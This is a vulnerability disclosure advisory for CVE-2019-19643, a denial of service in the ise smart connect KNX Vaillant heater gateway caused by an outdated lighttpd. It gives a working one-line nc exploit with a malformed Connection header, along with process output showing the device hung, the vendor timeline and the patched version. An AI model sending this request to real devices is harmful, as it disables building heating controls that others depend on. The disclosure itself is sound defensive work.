CVE-2019-19643 ise smart connect KNX Vaillant 1.2.839 Denial of Service
- CVE: CVE-2019-19643
- Author: psytester
- Title: ise smart connect KNX Vaillant 1.2.839 Denial of Service
- Vulnerability Type: CWE-400 Uncontrolled Resource Consumption
- CVSSv3 Base Score: 7.5
- CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
- Publishing Date: 12.08.2020
- Updated: –
- Vendor: ise Individuelle Software und Elektronik GmbH
- Product: ise Smart Connect KNX Vaillant
- Vendor contacted: 26.11.2019
- Vendor confirmation: 05.12.2019 with possible release date mid of 2020
- Vendor patch: 2.0.607 since 10.08.2020
- Vendor Reference: –
- Affected Firmware version: 1.2.839 tested
Product overview on vendor’s website.
This device connects a Vaillant heater to KNX building automation and has a TCP/IP stack for its configuration.
The analysis of the underlying operating system of the ise smart connect KNX Vaillant revealed that the BusyBox version v1.27.2 from 2017 with a Buildroot 2012.11.1 is installed as embedded Linux and that other outdated software packages are also used.
Just to name a few:
Buildroot: 2012.11.1 BusyBox: v1.27.2 from August 2017 Linux kernel: 3.2.20 from Jun 2012 dropbear: 2012.55 OpenSSL: 1.0.1c from May 2012 lighttpd: 1.4.31 ....
After a search for already known CVE entries, the lighttpd process proved to be susceptible because of CVE-2012-5533.
This vulnerability can be exploited by unauthenticated attackers with access to the web interface:
echo -ne "GET / HTTP/1.1\r\nHost: 126.96.36.199\r\nConnection: TC,,Keep-Alive\r\n\r\n" | nc 188.8.131.52 80
After that the lighttpd is permanently in 99% CPU load and the ise smart connect KNX Vaillant does not react anymore because the resources are used up and we have a Denial of Service:
PID PPID USER STAT VSZ %VSZ %CPU COMMAND 321 1 root R 5548 2% 99% /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
Just a restart of lighttpd process seems to be not enough to fix the overload condition, a reboot is required.
There might be much more vulnerabilities, as written in my German blog post about outdated embedded Linux Busybox/Buildroot installations.
CVSSv3 Base Score
CVSSv3 Base Score: 7.5
CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
lighttpd fix in new ise smart connect KNX Vaillant version 2.0.607
Base software is partly updated now with
Buildroot: 2018.02 BusyBox: v1.27.2 still from from August 2017 Linux kernel: 3.2.98 from Jan 2018 dropbear: 2017.75 OpenSSL: 1.0.2n from Dec 2017 nginx: 1.12.2 is used instead of lighttpd
cvedetails for scanning and preparing all CVEs, separated by vendor and product.
me, but I simply scanned known CVEs to use them.
The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.
The contents of this advisory are copyright (c) 2020 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.